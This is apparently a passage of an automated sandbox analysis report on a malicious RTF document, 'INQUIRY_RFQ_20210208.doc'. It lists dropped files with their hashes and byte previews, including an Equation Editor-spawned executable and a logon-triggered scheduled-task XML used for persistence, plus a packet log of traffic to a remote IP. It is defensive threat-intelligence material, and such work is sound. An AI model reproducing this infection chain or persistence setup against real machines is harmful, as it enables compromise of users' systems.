SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\tmp8650.tmp Download File
Process:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1619
Entropy (8bit):	5.146655374322247
Encrypted:	false
SSDEEP:	24:2dH4+SEqCZ7ClNMFi/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKB7Ntn:cbhZ7ClNQi/rydbz9I3YODOLNdq35n
MD5:	02E675B7B1B372913C891D7E2D17DFF4
SHA1:	1319226654DD92424D27C962C4562A57A6D1F099
SHA-256:	4198BCDDDA67F30062E4EF409EC0C6E06A7EE63817DDFC446EBBD81D2FEB02A6
SHA-512:	33E1B3EFC63B37BE544B5AD541B574FB385B87E639FC8CA2FEA6385514343BF70D0543F304BD26C287355AD9931864E5CD6921197E483C75239615AAE2E91B7E
Malicious:	true
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>user-PC\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>user-PC\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>user-PC\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true</StartWhenAvailable>

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\INQUIRY_RFQ_20210208.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Wed Aug 26 14:08:12 2020, atime=Mon Feb 8 13:38:33 2021, length=4001, window=hide
Category:	dropped
Size (bytes):	2128
Entropy (8bit):	4.540417975405111
Encrypted:	false
SSDEEP:	24:8dJK/XTwz6I4U8OAexcDv3qgdM7dD2dJK/XTwz6I4U8OAexcDv3qgdM7dV:83K/XT3InSogQh23K/XT3InSogQ/
MD5:	D494F3077B3C43EEC76F480C1BF764CB
SHA1:	96348C50807FA9B72BFDC500012038604A560090
SHA-256:	E98251C41331BDF9BE1674ED50B5CE86E79E02EBB8B52E3ABD2067EA4FEBDD1D
SHA-512:	1DADA090E424856462CBDD6FD2C264B16BA9B7ED185997FF25F0E2EE4762298D835A2ACB9EE4AEBF69B9CB1AF1F95E83340E8BF323E0469A925BC1EE6FB85A4E
Malicious:	false
Preview:	L..................F.... ...c....{..c....{......(................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.....HR.t .INQUIR~1.DOC..^.......Q.y.Q.y...8.....................I.N.Q.U.I.R.Y._.R.F.Q._.2.0.2.1.0.2.0.8...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\841618\Users.user\Desktop\INQUIRY_RFQ_20210208.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.N.Q.U.I.R.Y._.R.F.Q._.2.0.2.1.0.2.0.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......841618..........D_..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	98
Entropy (8bit):	4.3176586348130215
Encrypted:	false
SSDEEP:	3:M1K0JcL6l0AcL6lmX1K0JcL6lv:McUPHPLUP1
MD5:	019921982B9681FBBC7D5F018C47D260
SHA1:	920FF80BA63914642793E6DC43A28749C5E932B1
SHA-256:	C50F1998C80371B0038D875AC299967D1E3C1DC8593C3F39AB15258D56504ADD
SHA-512:	92EB4B42179B71BCBE29F2BDD68223A2170CFE538051BC64DD05F4ADB7ED007157CDD3545FF03D9938A9DF033B3AD7C95B40D17CA64F3CD0ED0CC77FB4049A87
Malicious:	false
Preview:	[doc]..INQUIRY_RFQ_20210208.LNK=0..INQUIRY_RFQ_20210208.LNK=0..[doc]..INQUIRY_RFQ_20210208.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1377280
Entropy (8bit):	6.244809260486293
Encrypted:	false
SSDEEP:	12288:sSqJajjiOqNXUbOIGm1XeoUGWZHnHHxGxrYvb8j4QjY2lQXKp07:5jiOLhXgRGxv/
MD5:	4A8EB2631D91AD206D94D22179C54C0E
SHA1:	E093FA42CD5AE5BCFA1CF04E300FAE5C44991AB0
SHA-256:	BC88C73FDA9A2EF51F979D2368A1039A04A0CE8199DC46B9F992A9FFACF58D8C
SHA-512:	81C6EFC4B5CC463D80B83ADA19E64E7802E25A6E88776CDCFFB47425CC000352267C9B0CA558D9C1C6124CF6CF07911701E32ECFE8F92C1AFB654B554AD9027D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[ `............................N.... ........@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H.......8...................(............................................0............(....(..........(.....o..........................(.......(.......(.......(.......(......N..(....o....(.....&..(........s.........s.........s.........s.........s..........0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0.................,.........o....+....9....~.........,2~.........(....o .....,.

C:\Users\user\AppData\Roaming\hEeIyOK.exe Download File
Process:	C:\Users\user\AppData\Roaming\RegAsmbvbvcrtyjgh.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1377280
Entropy (8bit):	6.244809260486293
Encrypted:	false
SSDEEP:	12288:sSqJajjiOqNXUbOIGm1XeoUGWZHnHHxGxrYvb8j4QjY2lQXKp07:5jiOLhXgRGxv/
MD5:	4A8EB2631D91AD206D94D22179C54C0E
SHA1:	E093FA42CD5AE5BCFA1CF04E300FAE5C44991AB0
SHA-256:	BC88C73FDA9A2EF51F979D2368A1039A04A0CE8199DC46B9F992A9FFACF58D8C
SHA-512:	81C6EFC4B5CC463D80B83ADA19E64E7802E25A6E88776CDCFFB47425CC000352267C9B0CA558D9C1C6124CF6CF07911701E32ECFE8F92C1AFB654B554AD9027D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 23%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....[ `............................N.... ........@.. .......................`............@.....................................S.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H.......8...................(............................................0............(....(..........(.....o..........................(.......(.......(.......(.......(......N..(....o....(.....&..(........s.........s.........s.........s.........s..........0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0.................,.........o....+....9....~.........,2~.........(....o .....,.

C:\Users\user\Desktop\~$QUIRY_RFQ_20210208.doc Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

Static File Info

General
File type:	Rich Text Format data, unknown version
Entropy (8bit):	4.161446898282686
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	INQUIRY_RFQ_20210208.doc
File size:	4001
MD5:	8f0c3ff4740ecc3efd564329aac5e652
SHA1:	7fe3be34cb5edd69acdc9e00e63c504c037e7744
SHA256:	ce53c97a3f040dad92f109dba7902d7cc3540ccd1c3f6ae8e82553fa26a76f81
SHA512:	fd08bfc321b8f6ab9a694a8d8eb7bf3450b8299f5d19638528a4e34f8df930099315bce6d7670fbc0842f8f33d5aa17043560957d2398191b3382cc28176f674
SSDEEP:	96:2nK+CnUAqM4VpEKnXV52fxunqgGrIhVNARUCa:2nSnuVpnnl5KxCRG0hVyyCa
File Content Preview:	{\rtf3956{\object83419218 83419218\objhtml\objw6401\objh3160{\*\objdata585564{\mcSp77116598626583.77116598626583\.77116598626583 \mcSp77116598626583.77116598626583\.77116598626583}

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000061h								no

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2021 06:39:00.945771933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.150747061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.150872946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.151515961 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.356785059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365443945 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365494967 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365536928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365576982 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365587950 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365618944 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365627050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365636110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365639925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365663052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365712881 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365712881 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365727901 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365757942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365770102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365802050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365817070 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365844965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.365854025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.365904093 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.368721962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.570548058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570611000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570688963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570753098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570795059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570832014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.570859909 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570861101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.570904016 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570930004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.570945024 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.570962906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.570985079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571000099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571027040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571038008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571069002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571089029 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571118116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571120977 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571161985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571182966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571202040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571218014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571243048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571254015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571284056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571304083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571352005 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571367025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571391106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571397066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571429968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571465015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571469069 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.571492910 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.571527958 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.572926998 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.775970936 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776056051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776124954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776135921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776159048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776227951 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776242971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776312113 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776313066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776376963 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776384115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776457071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776463032 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776526928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776561022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776572943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776591063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776678085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776714087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776770115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776776075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776833057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776845932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776907921 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.776918888 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776983023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.776987076 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777035952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777045965 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777102947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777112007 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777172089 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777201891 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777275085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777291059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777344942 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777353048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777364969 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777445078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777455091 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777487993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777496099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777529001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777538061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777570009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777585983 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777611017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777648926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777652025 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777658939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777692080 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777709007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777743101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777754068 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777787924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777805090 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777828932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777844906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777869940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777879000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777910948 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777925968 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777950048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.777964115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.777991056 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.778002024 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.778032064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.778070927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.778080940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.778090954 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.778126955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.778141975 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.778167009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.778182030 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.778208017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.778222084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.778265953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986002922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986129045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986227989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986295938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986295938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986330032 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986337900 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986362934 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986366987 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986434937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986439943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986506939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986509085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986572027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986577988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986635923 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986639023 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986699104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986699104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986761093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986764908 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986823082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986824989 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986887932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986891031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.986967087 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.986999989 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987030983 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987071991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987111092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987117052 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987132072 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987137079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987150908 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987185955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987190962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987225056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987231970 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987245083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987273932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:01.987294912 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.987348080 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.998341084 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:01.999955893 CET	49165	80	192.168.2.22	43.252.37.193
